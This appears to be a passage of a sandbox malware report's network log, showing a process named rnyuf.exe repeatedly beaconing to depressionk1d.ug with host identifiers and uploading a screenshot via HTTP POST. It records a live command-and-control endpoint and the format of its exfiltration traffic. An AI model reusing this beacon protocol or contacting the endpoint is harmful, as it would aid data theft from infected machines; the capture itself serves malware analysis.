                          Nov 12, 2021 22:24:10.314282894 CET10659OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:24:10.314321041 CET10670OUTData Raw: a4 20 a2 92 8a 00 70 3c 62 83 48 3a d2 9a 77 01 28 a5 e9 45 00 02 96 92 96 81 31 69 28 a2 98 87 0a 5a 41 4b 4c 1e e1 4b 8a 4a 5a 62 02 29 3b d2 d2 1a 00 05 38 50 28 a0 40 29 c2 9a 69 45 50 98 ea 28 a5 1d 69 88 51 4a 28 14 b4 d1 22 af a5 29 18 a4
                          Data Ascii: p<bH:w(E1i(ZAKLKJZb);8P(@)iEP(iQJ(")ykbDE XC8SH*,()Bbu'Zx6\bLB)vRBQIR`$xQjRZh+Tbc|*LQVfKLRF(xN)Mpd=))H(
                          Nov 12, 2021 22:24:10.314338923 CET10675OUTData Raw: a8 66 88 72 f5 a7 e6 9a 29 d5 0c d1 0f 53 c5 79 17 c4 f0 16 f2 c7 1f f3 cd ff 00 f4 2a f5 b1 d4 d7 91 fc 4e 3f e9 d6 3f f5 c9 bf f4 2a d2 87 c4 45 53 c7 5a 35 63 92 29 04 29 e9 52 62 94 57 2f 2a 3d 2e 66 33 ca 5e 3d a9 db 17 76 71 cd 2d 19 a7 64
                          Data Ascii: fr)Sy*N??*ESZ5c))RbW/*=.f3^=vq-dbhN!] @7n4Z9P(t0hVBJ!@sE93Ri)c<Dx*J)rc1(nqO ``PFFHD~D#KIF=*c4yIOvBx
                          Nov 12, 2021 22:24:10.314465046 CET10686OUTData Raw: 2b c0 6b dd be 03 de 5a da 78 7f 56 fb 4d cc 30 ee ba 5d be 6c 81 73 84 e7 19 ac 2b fc 06 b4 7e 23 9f ff 00 84 73 5c ff 00 a0 2e a3 ff 00 80 af fe 14 a3 c3 ba ea b0 61 a3 ea 40 83 90 45 ab f1 fa 57 bb ff 00 6c 69 9f f4 12 b3 ff 00 c0 84 ff 00 1a
                          Data Ascii: +kZxVM0]ls+~#s\.a@EWliO/v_]U?Y'Wwe)IdePLmZ5EU?AK/O>2eT6u<KSjV:wwje;j@S%-4&wN5X%WxP2
                          Nov 12, 2021 22:24:10.361993074 CET10717INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:10 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          254192.168.2.450071178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:10.356167078 CET10716OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:10.382844925 CET10717INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:10 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          255192.168.2.450073178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:10.514760017 CET10719OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:10.540616035 CET10719INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:10 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          256192.168.2.450074178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:10.669621944 CET10721OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:10.691987038 CET10724INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:10 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:10.692003012 CET10724INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          257192.168.2.450076178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:10.853035927 CET10726OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:10.880379915 CET10726INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:10 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          258192.168.2.450078178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:11.015224934 CET10728OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:11.041621923 CET10730INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:11 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          259192.168.2.450080178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:11.176049948 CET10731OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:11.202600956 CET10732INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:11 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          26192.168.2.449810178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:23.888482094 CET3227OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----7326d962c3e55cc0b528f327bd65f0a2
                          Host: depressionk1d.ug
                          Content-Length: 110667
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:23.888487101 CET3228OUTData Raw: 2d 2d 2d 2d 2d 2d 37 33 32 36 64 39 36 32 63 33 65 35 35 63 63 30 62 35 32 38 66 33 32 37 62 64 36 35 66 30 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------7326d962c3e55cc0b528f327bd65f0a2Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:23.888501883 CET3238OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:23.888523102 CET3240OUTData Raw: 48 7a d2 d1 4c 42 52 d1 40 a0 61 45 14 1a 04 14 52 aa b3 1c 2a 92 7d 00 ab 29 a7 5e 49 f7 6d df fe 04 31 fc e8 49 bd 82 e5 5a 2b 49 34 4b a6 fb c6 34 fa 9c ff 00 2a ad 7b 68 6c a6 58 cb 86 25 77 64 0c 77 3f e1 54 e1 24 ae d0 26 8a d4 51 47 6a 91
                          Data Ascii: HzLBR@aER*})^Im1IZ+I4K4*{hlX%wdw?T$&QGjQ@(Z()h(4QEzE$q^?YM#_Iuq]L*I<c*:;R@E-RZ)1ERLBbPhRbRSR)EPA
                          Nov 12, 2021 22:23:23.911058903 CET3244OUTData Raw: 32 b1 f3 ab 0f 8c e7 f6 9c ae e6 87 83 bc 41 35 cd de 95 a1 5e e4 dc d9 5d b9 8d ba e5 04 32 82 09 f6 24 0f a7 d2 bc db e3 77 fc 94 79 7f eb d6 2f e5 5e a3 e1 7f 00 ea da 2f 88 ed 35 1b ab 8b 37 8a 1d fb 84 6e e5 b9 42 a3 19 51 ea 3b d7 97 7c 6d
                          Data Ascii: 2A5^]2$wy/^/57nBQ;|m7{E:O'uo0h5UY<hqBjeL~ko^4.J9\aAdqSG?"ibl.yT^kG
                          Nov 12, 2021 22:23:23.911128998 CET3261OUTData Raw: 8f 31 c2 92 a9 93 81 b8 f6 c9 e3 9a 9f aa bf e7 fc 11 5f 5d a1 ff 00 3e 7f f2 66 7a ff 00 8b be 25 69 3a bf 87 e7 b1 b2 8e 60 65 2a 59 a4 2a 38 0c 0f 00 13 9e 40 af 1d a9 5a da e1 64 99 1a de 60 f0 2e f9 94 c6 73 1a e4 0c b7 1c 0c 91 c9 f5 14 c7
                          Data Ascii: 1_]>fz%i:`e*Y*8@Zd`.s]D)$dzmF0b#N0n]yt?U?V3y)())i)QE9IK%(PII@CEV<U~CjX55I0 7
                          Nov 12, 2021 22:23:23.911154985 CET3266OUTData Raw: 51 b4 4c bd a8 b1 4a 69 90 ed a3 6d 3f 14 62 81 dc 6e 29 0a d4 98 a3 14 58 57 22 29 48 63 a9 b1 4b b6 95 90 f9 8a c6 3a 8c c5 c5 5d db ed 48 53 35 3c 83 55 0c f6 8a a2 31 56 9b 45 9a 88 c5 52 e9 9a 46 a9 9a 63 a8 da 3e 2b 49 a1 a8 9a 1a c6 54 cd
                          Data Ascii: QLJim?bn)XW")HcK:]HS5<U1VERFc>+ITTx*y:!T+aZTc3Tn*r&*B)1Sb6M"TJ:F LRow-_Q@ODdaJ{2E])E4SYIIE1RfP1Em+}iC
                          Nov 12, 2021 22:23:23.933631897 CET3277OUTData Raw: 91 c6 aa c3 18 1b 70 01 35 95 e3 57 2f f0 ff 00 5e 25 19 71 65 20 f9 bb fc 95 e0 97 df 13 b5 fd 57 c3 37 9a 1e a7 f6 7b a8 ee 42 83 39 8f 64 80 ab 29 1c ae 01 fb a0 72 33 ef 5c ac 7a 95 fc 56 ef 6f 1d ed ca 42 eb b5 e3 59 58 2b 0f 42 33 82 2b a2
                          Data Ascii: p5W/^%qe W7{B9d)r3\zVoBYX+B3+8i^,DmdQ] (_Ie+nF0${|[z_]/.[R8<UpFNZ3_xeAXRCe7yD_! slOiiB
                          Nov 12, 2021 22:23:23.933676004 CET3281OUTData Raw: 88 06 6a 40 31 40 14 ec 71 41 2d 85 14 b8 a0 0a 64 89 4f 14 da 51 d2 81 31 69 ca 79 a6 d0 38 a6 26 4b 9a 5c d3 33 91 4e 1d 28 20 75 19 a4 a5 a6 23 43 46 ff 00 90 bd bf fb d4 fd 50 ff 00 c4 d2 e3 fd f3 51 e8 df f2 17 b7 ff 00 7a 9d a8 9c ea 33 ff
                          Data Ascii: j@1@qA-dOQ1iy8&K\3N( u#CFPQz3k?2'z(QhKIKHAJ))E@8QIJ)Nh UV>e?-/H~j?Hr)A}@:_sZq$?dIz\c4N;
                          Nov 12, 2021 22:23:23.933708906 CET3296OUTData Raw: 93 fe 25 ca d6 d3 48 8b 2f 9a f1 c7 2a 15 41 96 4e aa a7 39 c0 03 8a aa f5 67 07 68 f9 7e 62 a3 4e 12 8b 72 29 27 86 65 97 4d 8a ee 2d 4b 4f 92 49 a0 9a e6 0b 50 65 12 cd 1c 4c c1 d9 72 81 7f 81 8e 0b 03 81 d3 b5 57 4d 0e e9 f5 38 2c 04 b6 fe 6c
                          Data Ascii: %H/*AN9gh~bNr)'eM-KOIPeLrWM8,lBNGx}3XiVgQr-HJeR@bE%#N$L;;ZMQiQQH{ SbFyZWjZMybF
                          Nov 12, 2021 22:23:23.933734894 CET3306OUTData Raw: 40 85 a5 ef 48 29 45 31 05 3a 81 45 02 14 52 8a 4a 5a 04 2d 3a 9b 4e a6 48 a3 a5 02 8a 05 02 63 85 2d 20 a5 a7 a9 21 4a 3a d1 49 40 0f a7 0a 60 a7 8a 64 33 73 c3 a0 99 ae 0f a4 67 f9 1a cc fe 23 5a de 1a 19 6b b3 e9 1f f4 35 95 fc 47 eb 5c d4 ff
                          Data Ascii: @H)E1:ERJZ-:NHc- !J:I@`d3sg#Zk5G\/u- 9BEKIEJZ@-:NA#QHBI96GrpoxW*=<l|HVI2ONm?:?O?u5Z_:S1TO:+O
                          Nov 12, 2021 22:23:23.982192993 CET3341INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:23 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          260192.168.2.450081178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:11.340658903 CET10734OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:11.366655111 CET10735INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:11 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          261192.168.2.450082178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:11.513751030 CET10735OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:11.538675070 CET10736INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:11 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          262192.168.2.450083178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:11.688886881 CET10736OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:11.712512970 CET10738INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:11 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
